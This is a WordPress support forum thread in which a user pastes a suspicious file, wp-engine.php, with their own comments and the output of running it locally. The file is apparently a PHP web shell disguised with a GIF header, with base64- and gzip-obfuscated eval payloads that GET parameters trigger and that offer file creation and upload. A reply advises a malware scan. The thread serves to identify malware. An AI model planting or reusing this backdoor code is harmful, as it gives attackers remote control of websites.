WordPress.org

Forums

Malware File In WordPress (2 posts)

  1. shailesh07
    Member
    Posted 2 years ago #

    I found this file wp-engine.php in my wordpress installation,I think it is a malware. Can you help?

    // The comments are my attenpt to understand the file
    GIF89a???????????!??????,???????D?;?<?php
    $language = 'eng';
    $auth     = 0;
    $name     = ''; // md5 Login
    $pass     = ''; // md5 Password
    
    @error_reporting(0); //Disable error reporting
    @set_time_limit(0); // run a file for a fix period of time.
     $lol = $_GET['lol']; //collect values in a form
     $osc = $_GET['osc']; //
    
     //isset function: check whether a variable is set or not.
    
     //eval(gzinflate(base64_decode())) this function use for decode a code.
    if (isset($lol)) { eval(gzinflate(base64_decode('pZJda8IwFIbvB/sPMQhNQMR9XM05Cvsbg1DTE5vRJiEnnRbxvy9Jre5C8GJ35f143kMoyMYS+rNyn/5l/771H3T9+ABZxAHf6NI1TvSm6oDxJZ0Cc9nVG5pjxm5X9ZDa2QCEXa+TDQeWYnziXa2oqN7IoK0hOaWAH2PXA5INKYroa0XYDDoXhtFOvlZsqgk4aAzICjiALLJbps8cXiRQmj0Dv602jH4ZejFO8aQW4RYQG2hbccWeGeVVHw+6QxkwQHc+zG4FhsoHlkrlaF0gEz+GdhCEtCaAiYicjSKYWsgWKsPuTLoKMTS+vzk6mf+eLTWKWLW9l8DmKiGcdWDGh6ee8r+vRtMvsW90C2xWKrAqVjgnR5L9ZSwrD1Ud1cXT6vmVr8kpHStbi4mep6PiIfTe5FJSfgE=')); die; } 
    
    //OUTPUT 1:
    v0pCr3w
    sys:Windows NT HP-PC 6.1 build 7600 (Unknow Windows version Ultimate Edition) i586
    nob0dyCr3w
    
    elseif (isset($osc)) { eval(gzinflate(base64_decode('pZHNasMwEITvhb6DYgyWIZS2lF5CwA9SEI48ilUcyWhlmhDy7l3J+ekhkENPEjM73w5SqXfdetMSPj9UB+07yNKTrlfPTyUI28mmAexlyWdSoXsvbhYrZnI6Wu9EnjKoj5wNILEWVcW+NUIusBvjYbaTb428xBT2liLJCnvoKrtNuubhZQLlMjPw21sniy9XXI0TVxoI94DUYxjUDXtmNDd9LvSAcqCI3bmY3yiKbYgyhZrZukIufB7aIirtXYRjRJ5lEa5TekDr5IOVY0sU+zDdXXox/722saQ46qeg+dNNQox+hJsfvghF/ffVioLDP70dIBeNgTccqWtxFNl/4bAJaDtWl2+v7x/1SpxSWT14SvS8mpWAOAWXQ0n5BQ==')); }
    
    //output 2:
    
    Undefined variable: osc in D:\xampp\htdocs\shailesh\malciousrunfile.php(3) : eval()'d code on line 1'
    
    else { eval(gzinflate(base64_decode('pVNdi9swEHw/uP+wEQbFkCZpy0G5xKGhJEdpoAX3nkIwii3XAtsSllwnd+S/V7LsOL409KF+8cfOjGdnV07Ic0VzBR5IVTAhUyITKodO8OO7/3OLmzLeuTNwwpilVCPPRfOOd7pSvqmUTeX+joYJBzzfL+b7YoHHIhFBmZOMDt0xNp/mk/0Cd7iYFxmQUDGeewhBRlXCIw8JLhUCmofqKKiHsjJVTJBCTQz+XUQUQWBUPUQqBCyq75e6ih4UKSixqLZpqY6p5lQsUsnjw6cHcZgllP1K1OOH6VQctMLYabDa7aQVsb104iwXpQJrzWBaL3U+CCR70S/vpwh+k7TUjzmtTMWEga51LDcI9Y+UZltZWe4zpmxrQSnSs9YXC7tlxzqwkpduPk7R4qbv8n98a3OcRP/0/Wxhev5mhLUai89r13Sv1+71/g705SQkj+oVi7mg+dDu4ghwhd2ZhRi6RbUk+xWGcVUwRdvqCNqZuuB5HqyXG3/lwivU3SC9qjbTdt+flk/LjVlTM3U0g1MnTlNJbxP952/+yofBYHDJhjhMuTy7ad2femK4E1tfebDbZ3yc+qHZ6LvQdO1zyMVRI9ZfNyt/i+2x3GKVicDMC+9GzeF1ewnY6bTn+rqRfhRvY+iza+9/J5/+AA=='))); }
    
    //output 3:
    
    Notice: Undefined index: content in D:\xampp\htdocs\shailesh\malciousrunfile.php(3) : eval()'d code on line 1
    
    Notice: Undefined index: cfile in D:\xampp\htdocs\shailesh\malciousrunfile.php(3) : eval()'d code on line 1
    
    Notice: Undefined index: ufile in D:\xampp\htdocs\shailesh\malciousrunfile.php(3) : eval()'d code on line 1
    
    Windows NT HP-PC 6.1 build 7600 (Unknow Windows version Ultimate Edition) i586
    
    Notice: Undefined index: _create in D:\xampp\htdocs\shailesh\malciousrunfile.php(3) : eval()'d code on line 9
    
    Notice: Undefined index: _upload in D:\xampp\htdocs\shailesh\malciousrunfile.php(3) : eval()'d code on line 16'
    
    //FINAL OUTPUT:
    
    Warning: Unexpected character in input: '' (ASCII=1) state=0 in D:\xampp\htdocs\shailesh\malciousrunfile.php on line 2
    
    Warning: Unexpected character in input: '' (ASCII=1) state=0 in D:\xampp\htdocs\shailesh\malciousrunfile.php on line 2
    
    Parse error: syntax error, unexpected '?' in D:\xampp\htdocs\shailesh\malciousrunfile.php on line 2
    ?>
  2. Borko
    Member
    Posted 2 years ago #

    Seems like you're running the site locally,right?
    First of all,you should scan for malware on your computer. If it's infected,it will surely cause additional problems in the future.

Topic Closed

This topic has been closed to new replies.

About this Topic

Tags

No tags yet.